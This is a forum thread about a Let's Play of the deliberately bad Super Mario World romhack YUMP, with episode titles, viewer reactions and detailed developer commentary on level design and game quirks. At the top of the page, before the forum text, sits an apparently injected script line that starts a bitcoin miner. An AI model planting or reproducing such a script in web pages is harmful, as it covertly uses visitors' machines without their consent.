<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxysmw centralsmbx community

Let's Play YUMP - 40 - I guess the level is unbeatable now??

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
User avatar
QubicTom
Pleasantly Confused
Posts: 803
Joined: 4 years ago
First name: Tom
Location: The North

Let's Play YUMP - 40 - I guess the level is unbeatable now??

Postby QubicTom » 2 years ago

Do you ever think fondly back to the good old days when SMW Romhacks were made just for YouTubers like ProtonJon to play? Neither do I, they all sucked. But here's a hack inspired by those levels we used to see back in 2008, made by the team behind JUMP and JUMP-1/2. What happens when bad levels are made on purpose? YUMP happens! This is a work of art.

Download link: https://www.smwcentral.net/?p=viewthread&t=90404
This was accepted to SMWCentral.net: https://www.smwcentral.net/?p=section&a ... s&id=15892

YUMP Playlist
Ep1 - YouTubed Up Mario Party
Ep2 - heY bro lets save princess
Ep3 - SWEARMOUNTAIN
Ep4 - *Epic Sax Theme Plays*
Ep5 - Butter Bridge Autoscroll is the One True Autoscroll
Ep6 - More Punishing Than Death
Ep7a - RADIO GAGA
Ep8 - TRICKY JUMPS
Ep9 - Morsel Pit
Ep10 - how long do snails sleep
Ep11 - castle envahit
Ep12 - This Hack Was Accepted on SMWCentral.net
Ep13 - Too Good For YUMP
Ep14 - Driving Me Up The Walls
Ep15 - Glorious DPRK Nuclear Facility
Ep16 - YOu DEAD
Ep17 - Rachmaninov's Hands
Ep18 - The Meaning of CHOCO
Ep19 - Let's Fast Forward Half The Video
Ep20 - Blue in the Face
Ep21 - void of black
Ep22 - How did I lose 80 lives?
Ep23 - One Red Herring
Ep24 - duuuuuumb water
Ep25 - The Three Little Glitches
Ep26 - evil test
Ep27 - land of alibis
Ep28 - Ryugyong Hotel: The Movie
Ep29 - What's behind door number 20? Oh.
Ep30 - :squaremushroom:
Ep31 - It's Forest Ghost House you Idiot
Ep32 - Don't Buy Wine from this Vineyard
Ep33 - Time 666
Ep34 - the doomed plumber
Ep35 - Fast Brownies
Ep36 - why has he was invisible?
Ep37 - Yoshi... is now traumatized
Ep38 - Double Chocolate Brownies
Ep39 - I didn't even last ten seconds
Ep40 - I guess the level is unbeatable now??
Last edited by QubicTom on 10 Oct 2017, 23:38, edited 43 times in total.

User avatar
Pyro
cutest girl 2023
Posts: 884
Joined: 4 years ago
Pronouns: she/her
Contact:

Re: Let's Play YUMP - 1 - YouTubed Up Mario Party

Postby Pyro » 2 years ago

meaty boy.................
Image
Image
Image
Image
Image

User avatar
FrozenQuills
undefinable flair 2019
Posts: 781
Joined: 4 years ago
Location: my skull

Re: Let's Play YUMP - 1 - YouTubed Up Mario Party

Postby FrozenQuills » 2 years ago

my foavoirte is word war 3
Image
Image
Image
SMBX Tileset Compiler and Separator
The boss entry that made me eat a shoe.
Image

5th place counter: 5
(SMBX Forums CC11, SMBX Forums CC12, Endgame Madness Contest, SMWC Kaizo Contest 2016, SMWC 24hr Contest 2018)

User avatar
Grounder
Posts: 3297
Joined: 5 years ago

Re: Let's Play YUMP - 1 - YouTubed Up Mario Party

Postby Grounder » 2 years ago


Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

ImageImageImage

chridd
Doesn't post frequently
Posts: 30
Joined: 9 years ago
First name: chri
Pronouns: she

Re: Let's Play YUMP - 1 - YouTubed Up Mario Party

Postby chridd » 2 years ago

QubicTom wrote: Do you ever think fondly back to the good old days when SMW Romhacks were made just for YouTubers like ProtonJon to play?
Sometimes...

Yeah, I think the two-color pipes are what happens when you put a pipe on a screen boundary (since pipe color is determined by what screen you put the pipe on). The music looping weird is due to the coin snake placed near the midpoint (since these normally cause the P-switch music to play, when they spawn from a block, so when it ends it goes back to playing the normal music again).

Cobsters
big fat bozo idiot haha
Posts: 5
Joined: 3 years ago
Pronouns: he/him/his
Location: USA
Contact:

Re: Let's Play YUMP - 1 - YouTubed Up Mario Party

Postby Cobsters » 2 years ago

this is such a GOOD HACK

User avatar
morsel/morceau
Posts: 373
Joined: 10 years ago
Location: exotic horse island

Re: Let's Play YUMP - 1 - YouTubed Up Mario Party

Postby morsel/morceau » 2 years ago

Wow, that transition to the main overworld was better than vip 5's :o . Ah, the days when we ported West End Girls to smw just because.

I really should play this myself though since I don't know much about it other than what I did. But I do remember playing a certain puzzle level in a cave and I thinking it quite good.
dont wanna jihad no more

Jongseok
Posts: 325
Joined: 3 years ago
Location: Seoul, Korea

Re: Let's Play YUMP - 1 - YouTubed Up Mario Party

Postby Jongseok » 2 years ago

morsel/morceau wrote: Wow, that transition to the main overworld was better than vip 5's :o . Ah, the days when we ported West End Girls to smw just because.
I just love Main OW port♥!
Could I get a mml file?
Last edited by Jongseok on 08 Jul 2017, 15:55, edited 1 time in total.

User avatar
xfix
:)
Posts: 750
Joined: 10 years ago
First name: Konrad Borowski

Re: Let's Play YUMP - 1 - YouTubed Up Mario Party

Postby xfix » 2 years ago

First world submap - Hydlide 3: The Space Memories - Town
Overworld map - Neon Genesis Evangelion (anime) - A Cruel Angel's Thesis

Grassy Plains 1 by snoruntpyro

This level began it all. I think that was like the first level made for a project? That said, it technically wasn't made for this project, it's pretty much Pyro's first SMW level, made back in 2010. After it, many people have shown their first levels, and even a collab was started.

The mushroom hill backgrouind is somewhat special as this one has its own palette it was meant to be used with. That said, the background is a separate thing from background palette, so you can easily use background with palette that was unintended. There are other backgrounds like that, like underwater background or cave background. Most backgrounds just use the same palettes as other backgrounds however, as they have a single color so it's easy to reuse the same palette gradient for most backgrounds. And this also allows for varying background colors - in Super Mario World the same background is often reused with different colors. For example Donut Plains 1 and Donut Plains 4 have exact same background, but different colors.

Mushroom hills background uses two palettes however to save tiles. Essentially the same tile is used for dark blue hill overlapping dark blue hill as for dark blue hill overlapping light blue hill. One palette row is a regular gradient effect, but the second one only has dark blue hill colors. This works when using usual blue palette, but other palettes aren't exactly designed for that, which is why there is weird palette where normally dark blue hill would overlap another dark blue hill.

This is sorta Yoshi's Island 1, the same enemies, background, slope at beginning just like YI1, but not really. I think it's based of it, but doesn't really look similar.

YOSHI'S ISLAND 2 by GlitchMr

While there were many first levels added in a project, this isn't one really. It was made and added late in project's development. I felt like the project lacked Yoshi's Island 2 blatant level edit, so I decided to add one. It's essentially just that, Yoshi's Island 2 modified by someone who was learning how to use Lunar Magic. Unfortunately I lost my first ROM hack, but I tried to sorta make it feel like my first ROM hack. I experimented with everything that I haven't seen in Super Mario World.

This one actually isn't using level slot 106, as that was taken by possibly kaizo. However, to preserve accuracy, original message boxes and unmodified bonus room were brought from original Super Mario World. There are other blatant level edits in YUMP, but they aren't called directly by their SMW level name, unlike that one.

Nets sorta look weird because inserting nets correctly is sorta tricky actually and it takes lots of experimenting to place nets right. While I do know how to place nets now, it took me a while to realize, which is why they are intentionally placed wrong here. I find it weird that net graphics are loaded in every level however, considering they were only used in castles in original game. Something similar applies to bushes and berries, which are also loaded in every level for some reason, even if only used in grassland levels. Super Mario World also loads Bullet Bill shooters in every stage, but I think only one stage actually used those (Outrageous). So many things loaded that were rarely used in actual game...

Flying red coins are flammable. I like the placement of them in my level, even if that wasn't intentional. The player will likely start level by holding X or Y and accidentally shoot those. Considering grassy plains 1 provides a flower and that level isn't all that hard, chances are player will have a flower.

Lots of 1UPs were placed, as I sorta wanted to have this stage as a lifefarm, as I was worrying people would Game Over in Cirno stage. Considering that now first world pretty much floods player with 1UPs, it doesn't sound like a legitimate concern anymore, but it was a concern back when I was designing this stage.

Lava doesn't work as sprite interaction with water/lava was disabled. For some reason Super Mario World levels have to explicitly specify whether sprites other than Mario can interact with those. In this level, I didn't do it.

Also, I maliciously left the spinjump message box in a level. I was hoping somebody would die actually following the instructions about how to spinjump when the floor was turn blocks. Ah well.

A feather was placed before Midway Point (not shown in video) as continuining in Yoshi's Island 2 is rather painful, considering munchers sequence just after Midway Point. World 1 wasn't supposed to be frustrating, so I decided to put a feather to make things less so. For a similar reason there is a feather at beginning - I felt like the level was too frustrating, so I just put cape to make it easier. This also provides a nice place to take feathers from to break other levels.

Music weirdly restarts because I put directional coin. Normally those are placed in prize blocks, and the prize block is responsible for starting P-Switch music. However because I put it directly in a level, the music didn't start. That said, when it hit the wall or ran out of coins, it assumed the P-Switch music was playing, but it wasn't, which caused music to restart as it tried to restore original level music.

The level is sorta spammy with sprites. Here an explanation is that the hacker person wanted to make his level hard, so he was placing sprites without thinking. This will be an unfortunate theme with my future levels. Oh well, I apologize for that in advance.

WORLD WAR 3 by lolyoshi

I remember this level actually being in World 2 (not that a world means much in YUMP because overworld layout is weird). The reason for that was that the name of this level may suggest it's a hard level, but... it's not really. It was moved to World 1 to have numbered world sorta - Grassy Plains 1, YOSHI'S ISLAND 2, WORLD WAR 3. Sure, the world names are somewhat inconsistent within single world, but oh well, it sorta makes sense.

This level is a fortress to make it more scary and to have a save point for Cirno level. Again, I was worried people would Game Over in it, go figure.

cirno's perfect math class by worldpeace

After world war, it's time for world peace. I'm sorry for a terrible pun.

So, you were disappointed by lack of Beloved Tomboyish Girl port. So I suppose I can provide something even better then to balance that out: Cirno's Perfect Math Class. Can you solve the mathematical problem in this video? Somebody even made a SMW port of Cirno's Perfect Math Class. Unfortunately, https://youtu.be/Fzny4rJrTZw?t=640 is the only video of that port I could have found, and it's a showcase of Hurry Up glitch in Super Mario World.

The level gimmick is that because Cirno is stupid, you have to select wrong answers, and something happens in a level to make the answer you picked right. In the mathematical question, there are two identical choices (one Urchin), however one reveals to be actually two - this is a reference to Morsel's VLDC8 entry. If you haven't played that one, feel free to - it's a really good one - it's in Best World if you want to find it. I was going to put a link to the part of Municipal Swimming this was a reference to, but I figured it's better to ask people to actually play it, because it's worth it.

Sudden warping is caused by a sprite that exists in Super Mario World that does exactly that. There is a four tile high invisible sprite in Super Mario World that causes player to move to its right side when touched. It was used in Yoshi's Island 1 for... no reason whatsover. It's placed near diagonal pipe shooter that is exit of Yoshi's Island 1's bonus room, but... I tried removing it, and it doesn't change flight path in any way. The diagonal pipe in Yoshi's Island 1 is the only one using that sprite, no other diagonal pipe uses it. For all practical purposes, in Super Mario World it's an unused sprite that I have no idea why it exists.

As for ice physics? What, you think Cirno is an ice fairy??? Sorry to disappoint you, Cirno is not. Have an official artwork of Cirno. Is there anything suggesting ice fairy here?

Image

How you say broke in Spanish by lolyoshi

If Google Translate is to be believed, the answer is "rompió". So essentially this level is a romp.

This is essentially a janky sort of a romp level made quickly, and early in YUMP development. There are lots of cement buildings so it sorta looks like a city level. It forces Yoshi removal by forcing lots of vine climbing in a level - unless you fly, but you probably won't have capes if you died in perfect math class. There is even a lifefarm using one of vines in a level, but it's sorta slow, and there are better lifefarms in a game - but that will have to work until you reach next lifefarm.

The goal point is placed somewhat weirdly. Goal points in Super Mario World just like Midway Points can have bottom part, but that was never used in actual game, and at some point in game's development goal bottom graphics were replaced with bush graphics. The code responsible for rendering goal bottom still exists however.

---

As for overworld, feel free to blame me for A Cruel Angel's Thesis theme used on it. I was surprised that there was actually a port of that, so I mentioned it on YUMP Discord, and I guess it ended up being overworld map theme. It's quite fitting however, what with YUMP being a deconstruction of typical ROM hack. Somewhat?

That's about it for developer commentary for now. I will post dev commentary for each level you got every exit of, so possibly kaizo dev commentary will have to wait. Sorry.

User avatar
QubicTom
Pleasantly Confused
Posts: 803
Joined: 4 years ago
First name: Tom
Location: The North

Re: Let's Play YUMP - 1 - YouTubed Up Mario Party

Postby QubicTom » 2 years ago

GlitchMr wrote: -Grassy Plains 1 by snoruntpyro-
This is sorta Yoshi's Island 1, the same enemies, background, slope at beginning just like YI1, but not really. I think it's based of it, but doesn't really look similar.

-YOSHI'S ISLAND 2 by GlitchMr-
I felt like the project lacked Yoshi's Island 2 blatant level edit, so I decided to add one. Flying red coins are flammable ... The player will likely start level by holding X or Y and accidentally shoot those.

Lava doesn't work as sprite interaction with water/lava was disabled. For some reason Super Mario World levels have to explicitly specify whether sprites other than Mario can interact with those. In this level, I didn't do it.

Also, I maliciously left the spinjump message box in a level. I was hoping somebody would die actually following the instructions about how to spinjump when the floor was turn blocks. Ah well.

Music weirdly restarts because I put directional coin. Normally those are placed in prize blocks, and the prize block is responsible for starting P-Switch music. However because I put it directly in a level, the music didn't start. That said, when it hit the wall or ran out of coins, it assumed the P-Switch music was playing, but it wasn't, which caused music to restart as it tried to restore original level music.

-WORLD WAR 3 by lolyoshi-
This level is a fortress to make it more scary and to have a save point for Cirno level. Again, I was worried people would Game Over in it, go figure.

-cirno's perfect math class by worldpeace-
Sudden warping is caused by a sprite that exists in Super Mario World that does exactly that. There is a four tile high invisible sprite in Super Mario World that causes player to move to its right side when touched. It was used in Yoshi's Island 1 for... no reason whatsover.

-How you say broke in Spanish by lolyoshi-
If Google Translate is to be believed, the answer is "rompió". So essentially this level is a romp.
This is some detailed dev commentary, thank you for putting so much time into it! I hope others come along and talk about their levels, or make dev commentary videos about them (it can take a lot of work to make something bad!). So you're revealing the exact level authors? I'll continue to keep those vague in my video descriptions. The bits I left in the quote above are the main points I took from the commentary - I didn't know about the invisible warp sprite or how the weird music loop happened (I thought it was on purpose to make fun of SMBX music looping).
chridd wrote: The music looping weird is due to the coin snake placed near the midpoint (since these normally cause the P-switch music to play, when they spawn from a block, so when it ends it goes back to playing the normal music again).
This is something new that I've learned, and maybe someone will find a clever way to use this in a timed-with-the-music level.
Cobsters wrote: this is such a GOOD HACK
The best since 2007
morsel/morceau wrote: I really should play this myself though since I don't know much about it other than what I did. But I do remember playing a certain puzzle level in a cave and I thinking it quite good.
Please post your reactions to levels if you do play it yourself! I'm glad you liked my dumb puzzle :P Wondering how many people will find the real solution (please, nobody post spoilers for any puzzles in the thread, even in spoiler tags!)

Like all good modern AAA video games, YUMP has HD pre-rendered cutscenes with professionally written dialogue
Ep2 - heY bro lets save princess

User avatar
Grounder
Posts: 3297
Joined: 5 years ago

Re: Let's Play YUMP - 2 - heY bro lets save princess

Postby Grounder » 2 years ago




I'm totally using okie donkey now.
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

ImageImageImage

User avatar
xfix
:)
Posts: 750
Joined: 10 years ago
First name: Konrad Borowski

Re: Let's Play YUMP - 2 - heY bro lets save princess

Postby xfix » 2 years ago

I think I will be using spoilers for dev commentary in order to avoid people accidentally reading it before watching the episode. I decided to only discuss the first stage, as it's sorta late for me, and I don't feel like writing more. Rest of levels will be commented on later on. (also part 2 of the first level played in that video commentary will be in that too)
The story level (Episode 00/eyecatch) by GlitchMr

Music: The Melancholy of Haruhi Suzumiya (anime) - Koi no Mikuru Densetsu (Mikuru Legend of Love)

I will consider that a single level, because for all intents and purposes it's the same level split into two levels.

<GlitchMr> writing a dev commentary for first castle of YUMP will be a thing... oh dear
<GlitchMr> why i decided to make a dev commentary for yump...

This level is well, The Melancholy of Haruhi Suzumiya reference. After noticing original AddMusic had opening of episode 00 of that anime, Koi no Mikuru Densetsu, I was like, hey, let's make a level based on episode 00 of that anime (this is link to entire anime episode, it's the first episode really so not much of spoilers really) just to see if anyone notices that - in fact I hid that YUMP developer team. Anime episode itself was, let's say, intentionally bad, which further supported making a level based on it - it's YUMP - of course it's going to have bad levels.

As I was going for a plot based level, I decided to have cutscenes. Vanilla entry 2010, Tech Support vs WWSPA (warning: intentionally broken sound) was an infamously bad level (probably a troll level even) and had terrible cutscenes, so I decided to base of those. The first screen of that level contained list of characters, so I decided to have a list of characters too. Because I'm quite unoriginal, I just decided to use typical Super Mario Bros. characters - Mario, Luigi, Peach and Bowser, as those had graphics in vanilla Super Mario World. I also made Mario green and Luigi red to appear as if author was colorblind and swapped their names around. In addition, I decided to make it ambiguous whether "Princess" is name of turtle in clown-copter or a princess (it's near both).

The number 8 in the intro was supposed to be a reference to infamous Endless Eight arc of that anime. Arc was consisting of eight episodes which were pretty much the same episode with minor changes. This is not actually a part of Episode 00, but I decided to include it for some reason. In the arc, there was a time loop repeating many many times (more than 8 by the way) until it was broken. In a version you played the time loop was breakable by not dying in the final section. However, this was so controversial to have in first world that Lazy got rid of that aspect of a level and publicly apologized - it's enough to reach DONUT DIE section.

Actual anime on the other hand at beginning had a cast list which listed everybody playing as themselves. Mikuru Asahina as Mikuru Asahina, Itsuki Koizumi as Itsuki Koizumi, and so on. I decided to not use anime characters as I wanted to hide the anime reference, instead we have Mushroom Kingdom characters.

Then I go about introducing plot of a level - saving a Princess from Clown. Typical. Anime however had a plot of battle waitress from the future Mikuru Asahina protecting an esper Itsuki Koizumi from Yuki Nagato, an evil witch. Essentially the same however.

The first actual playable has CASTLE as text. This is a reference to Chaos CompleXX, to be exact "unique castle" in that game which written "UNIQUE CASTLE" in the background. I also decided to write this in order to violate "show, don't tell" rule of good writing (this is YUMP, who heard of good writing question mark). I decided to tell player that he is in a castle, but without showing so. I also added some fake Kaizo traps as a warning about future parts of a game.

Later in a level, there is repetitive corridor of cement blocks and water. This is a reference to a scene in anime where Mikuru Asahina runs multiple times through the exact same place - the background is identical, and yet running was shown multiple times.

There is then an encounter with Clown/Yuki Nagato. In cutscene, I decided to put Demonic Gatheric (an infamously bad plot based SMBX level) reference with some "demons". No reason for those, they didn't exist in anime. There is a sudden appearance of Peach which was supposed to be kidnapped by Bowser. In original anime, Itsuki Koizumi (essentially Princess in my version of Episode 00) appears for no reason after a battle, which is why there is a dialogue by Princess ("then we stand a chance").

Shortly after first encounter, there is a second one where Clown/Yuki Nagato uses mind controlled people (Ninjis?) to attack Mario/Mikuru Asahina. In anime she gets thrown into water, but I decided to instead kill the player by making him meet the wall and saying U DED LOL.

The way warp works is because Display Message sprite was meant to be only used in intro, and it initializes game by means of setting overworld submap to Yoshi's Island without applying a patch to remove that behaviour. Eyecatch and Episode 00 have the exact same relative position on overworld map, so warp caused by appearing message (DONUT DIE) moves the player into eyecatch.

This is halfway point of the anime. Eyecatch (commercial bumper) appears.

Image

This was represented in my level by making a level called "eyecatch" which started saying "Adventures of Marioyolo". This is a reference to episode subtitle: "Adventures of Mikuru Asahina". "Marioyolo" is a reference to Kaizo level in VLDC8.

The gun part of thing is a reference to gun advertisement in original anime. I pretty much quoted anime here, except decided to add "Or do, it's edgy", because it's having a gun in family friendly Super Mario game is edgy and typical of many Mario parodies - let people as well have fun with it. Also in a way it's a reference to Aristocrat's VLDC X entry where "Mario had gun". Then Mikuru Asahina shoots, and I give the player opportunity to shoot as well for 1UPs. This also had an advantage of providing neat lifefarm early on, as in this ROM hack, a life farm will likely be required.

There is more happening in a story, it turning into a comedy where Mikuru Asahina and Yuki Nagato start playing together. I didn't represent that in Episode 00, for that, go check Mario Kart games. Or Tennis. Or whatever other spin-off (Mario Party will work too I assume?).

They however at some point agree to have a final showdown on a roof. The battle is a bit of a joke, Princess/Itsuki Koizumi even helps Mario/Mikuru Asahina even when technically meant to be mind controlled (again, the anime episode was intentionally bad). In game, this is represented by Princess throwing mushrooms at Mario. Mario and Princess (Mikuru Asahina and Itsuki Koizumi) decide to go on holiday ("At last it is over, Asahina", "Mario's adventure is over"), and Itsuki Koizumi's powers awaken causing cherry blossoms or something (represented on overworld by a tree turning pink).

The castle destruction scene is a reference to Kyon's (narrator) commentary in Episode 00. During the entire Episode 00, Kyon in anime was complaining about how plot didn't make sense, "explaining" things happening in anime (again, show don't tell), pointing out mistakes during filming and so on. In this case, I decided to put a stupid message saying that (lol)yoshi already beat the entire game beforehand and complaining about plot in a level not making any sense (this is what Kyon complained about all the time).

There is more I wanted to say (to be exact the reason why 1UP checkpoint was used instead of Midway Points), but the explanation is already stupidly long, so whatever. Perhaps next time...

Jongseok
Posts: 325
Joined: 3 years ago
Location: Seoul, Korea

Re: Let's Play YUMP - 2 - heY bro lets save princess

Postby Jongseok » 2 years ago

Baserom?? Available? Please upload the baserom.

Rockythetigre
Posts: 27
Joined: 3 years ago

Re: Let's Play YUMP - 2 - heY bro lets save princess

Postby Rockythetigre » 2 years ago

woah, nice

these in-depth devlogs are awesome to read!

User avatar
xfix
:)
Posts: 750
Joined: 10 years ago
First name: Konrad Borowski

Re: Let's Play YUMP - 2 - heY bro lets save princess

Postby xfix » 2 years ago

dev commentary continuation ftw
story level commentary part 2 (level by GlitchMr)

As I said before in previous dev commentary post, this level is a huge reference to Episode 00: Adventures of Mikuru Asahina from Melancholy of Haruhi Suzumiya anime.

There were many changes to the level after initial submission.

Initially Midway Point was used instead of 1UP checkpoint. However, this was changed during testing, as Midway Point status is saved for level pointed by current overworld tile (instead of level number) for some reason which in case of Episode 00 would be actually eyecatch (as Mario was already teleported by that point). 1UP checkpoint was placed at end of DONUT DIE section.

While you played the version with 1UP checkpoint at end of DONUT DIE section, this was changed so that 1UP checkpoint is at beginning of this section to not make things too confusing - this is World 1 after all.

The reason why eyecatch exists is that Lazy pointed out that Display Message Block bug wasn't fixed, so I reserved a level to fit in plot of that level (as a continuation of that one). eyecatch was made after everything else.

As for multiple Bowser cutscene the reason for it is that vanilla cutscenes were annoying to make, and I was quite angry placing letters letter by letter, so I just copied multiple Bowsers into a cutscene and hoped for a best. It sorta shows a powerful attack however even if no text was involved.

"w" in "w# he is preeparing attack" stands for Weegee, a nickname of Luigi from DOS version of Mario is Missing.

Bowser fight is mostly here because I wanted to have a reference to Aristocrat's entry in VLDCX which also ends with Bowser's fight. However, it ended up working fairly well for matching Episode 00 plot.

Cutscene letters come from Bowser fight ending cutscene (also seen in this level), which is why it only had M, P and Y could possibly be uppercase.

CASINO NIGHT by GlitchMr

Before YUMP even existed, there was a joke hack collab called An Anti SMWC Production which was never finished however. This level is pretty much copied from it (the level in that collab was also by me) and was initially called JUMP FOR EXCITEMENT. This is the only level in YUMP coming from that collab, nothing else was copied from it - and the collab had pretty bad levels meant to be played with savestates, not exactly definition of fun. I didn't provide that name for a level in An Anti SMWC Production, I think collab manager put this name as I didn't name my level. I uploaded a video of that level in An Anti SMWCP Production a while ago.

I decided to make a level a bit harder, so there is no safe floor, unlike original version of a level. Ending replaced two pointless message boxes with a surprise flying Koopa trap from GAMBLY NIGHT in VLDC9. The name CASINO NIGHT comes from Sonic 2, but it's obviously based on GAMBLY NIGHT in VLDC9.

GOTCHA Haehaehae by Jolpengammler

Message box is actually readable if you bring P switch from later part of a level. It is empty however, as its author did not expect it to be readable.

Note blocks are hittable from four sides variety which is sorta buggy especially when you put many of those in a row - as you can possibly land on next one (which sorta sticks you to it until bounce happens) before the one you are currently on even manages to bounce you. This makes player pretty much slide on note blocks without bouncing.

I don't have much to say about this level, as I don't know much about its development.

User avatar
ft029
m/m wannabe
Posts: 472
Joined: 3 years ago
Location: U.S.

Re: Let's Play YUMP - 2 - heY bro lets save princess

Postby ft029 » 2 years ago

Dev commentary about Possibly Kaizo, if anyone would want to read it
This is the first level I made for YUMP. The old version did not even require red switch palace and was only one exit. But to provide more variety to the overworld, I added another exit (the one that is not in the cave).

The very first version of this level had most of the same setups, but it's different from now. For instance, there weren't 3 red parakoopas at the beginning (added to save the player time), and there was an item box instead of a mushroom falling from the sky. However, the item box could be hit from the side with a koopa shell, so I removed it.

When I sent the first half of this level for testing, I had not actually beaten the level without savestates yet. But Enjl beat the kaizo version quite quickly before I did!

In the second half, there is an obstacle where you must keep a shell for shell-jumping. It is necessary to spinjump on a spiny however.

There is an off-screen rope, so if you try to do the thing where you throw the shell up and then spinjump to catch it, the shell will simply disappear!



The entire level is actually moved up several tiles. This is because

of the chucks that rise up out of the ground once you have the red switch

.

Originally, Lazy thought the level not youtube enough, and replaced lots of land with cement and put in more floating munchers. I don't know why, but I persuaded otherwise. I guess I wanted the level to seem normal when actually it is evil. Oh well.
Mosts Awards:
Image
Image

User avatar
QubicTom
Pleasantly Confused
Posts: 803
Joined: 4 years ago
First name: Tom
Location: The North

Re: Let's Play YUMP - 2 - heY bro lets save princess

Postby QubicTom » 2 years ago

Jongseok wrote: Baserom?? Available? Please upload the baserom.
I left a download link to the game in the first post of this thread :) Or are you looking for a fishmarket rom? I don't think there's a fishmarket rom with everything in it in their latest versions. I encourage you to play through the full game if you have the time!
GlitchMr wrote: dev commentary continuation ftw
ft029 wrote: Dev commentary about Possibly Kaizo, if anyone would want to read it
I appreciate all the dev commentary! GlitchMr, I never in a thousand years would get all those references in that level. But the fact that it's inspired by something real is remarkable and amazing. ft, I'm looking forward to trying the real version of your level :lol:

Starring a forest level, swearing, and a level by me! Then fish then another forest level. Quality video description right here.
Ep3 - SWEARMOUNTAIN

User avatar
Grounder
Posts: 3297
Joined: 5 years ago

Re: Let's Play YUMP - 3 - SWEARMOUNTAIN

Postby Grounder » 2 years ago




Man, those Sumo brothers move fast when in the air.

Also, way to die a lot on your own level. :P
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

ImageImageImage

Jongseok
Posts: 325
Joined: 3 years ago
Location: Seoul, Korea

Re: Let's Play YUMP - 2 - heY bro lets save princess

Postby Jongseok » 2 years ago

QubicTom wrote:
Jongseok wrote: Baserom?? Available? Please upload the baserom.
I left a download link to the game in the first post of this thread :) Or are you looking for a fishmarket rom? I don't think there's a fishmarket rom with everything in it in their latest versions.
Yes, I mean fishmarket rom like JUMPhalf
I want to get MML files in AM(addmusic) folder.

User avatar
SAJewers
hi
Posts: 3199
Joined: 7 years ago
Location: Nova Scotia

Re: Let's Play YUMP - 3 - SWEARMOUNTAIN

Postby SAJewers » 2 years ago

can't wait for raocow to play this Kappa
ImageImageImageImageImage
Image
ImageImageImageImage

User avatar
Lazy_
rudine
Posts: 170
Joined: 4 years ago
Pronouns: he/him/his
Location: switzerland

Re: Let's Play YUMP - 3 - SWEARMOUNTAIN

Postby Lazy_ » 2 years ago

@jongseok: https://drive.google.com/open?id=0BxtNG ... lRkVVRyVTg
the evangelion song you're looking for is in the OW folder. the songs are all for am405 so you'll have to add #am4 in the mml files if you want to insert them with amk. also some of the songs are horribly unoptimized so insert at your own risk
is there an integer overflow when you become 256 years old

User avatar
QubicTom
Pleasantly Confused
Posts: 803
Joined: 4 years ago
First name: Tom
Location: The North

Re: Let's Play YUMP - 3 - SWEARMOUNTAIN

Postby QubicTom » 2 years ago

Grounder wrote: Also, way to die a lot on your own level. :P
I blame rng! :lol: The level is free once you get passed the first jump - I just want people to react to the name more than anything! Also, please keep going with these music videos. Someone will have to explain the reference to me, because I have no clue what's going on!
SAJewers wrote: can't wait for raocow to play this Kappa
I am genuinely concerned about this LP if it happens. At least half of the audience won't get it, and the game does have some awful levels. (I mean, they are all 'bad' in a sense, but some are worse than others!) But I do want to see his reactions to, well, everything!
Thanks for posting that for me! I didn't know the Google Drive link.

Oh hey, the first switch palace! Surely it'll be a nice bonus room and good times will be had.
Ep4 - *Epic Sax Theme Plays*

User avatar
Grounder
Posts: 3297
Joined: 5 years ago

Re: Let's Play YUMP - 4 - *Epic Sax Theme Plays*

Postby Grounder » 2 years ago




ur mam lel ecksdee could probably do with one less Muncher at the very end, there.
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

ImageImageImage

User avatar
ft029
m/m wannabe
Posts: 472
Joined: 3 years ago
Location: U.S.

Re: Let's Play YUMP - 4 - *Epic Sax Theme Plays*

Postby ft029 » 2 years ago

Grounder wrote: ur mam lel ecksdee could probably do with one less Muncher at the very end, there.
I actually suggested that, but "YOUR MOM isn't even that hard" according to one of the developers of this hack.

Also, QubicTom died to the first spiny way more often than anything else.
Mosts Awards:
Image
Image

User avatar
cozyduck
Posts: 204
Joined: 10 years ago
Location: Switzerland

Re: Let's Play YUMP - 4 - *Epic Sax Theme Plays*

Postby cozyduck » 2 years ago

ft029 wrote:
Grounder wrote: ur mam lel ecksdee could probably do with one less Muncher at the very end, there.
I actually suggested that, but "YOUR MOM isn't even that hard" according to one of the developers of this hack.
I mean, this is definitely true in the context of this hack. I also imagine it must have been quite hard to figure out the difficulty curve for this hack. As far as I've played into this I gotta say that all things considered they've done a good job.

Btw, can any one of you link me to the level list with difficulty the official difficulty ratings?


Return to “let's play”

Who is online

Users browsing this forum: No registered users and 6 guests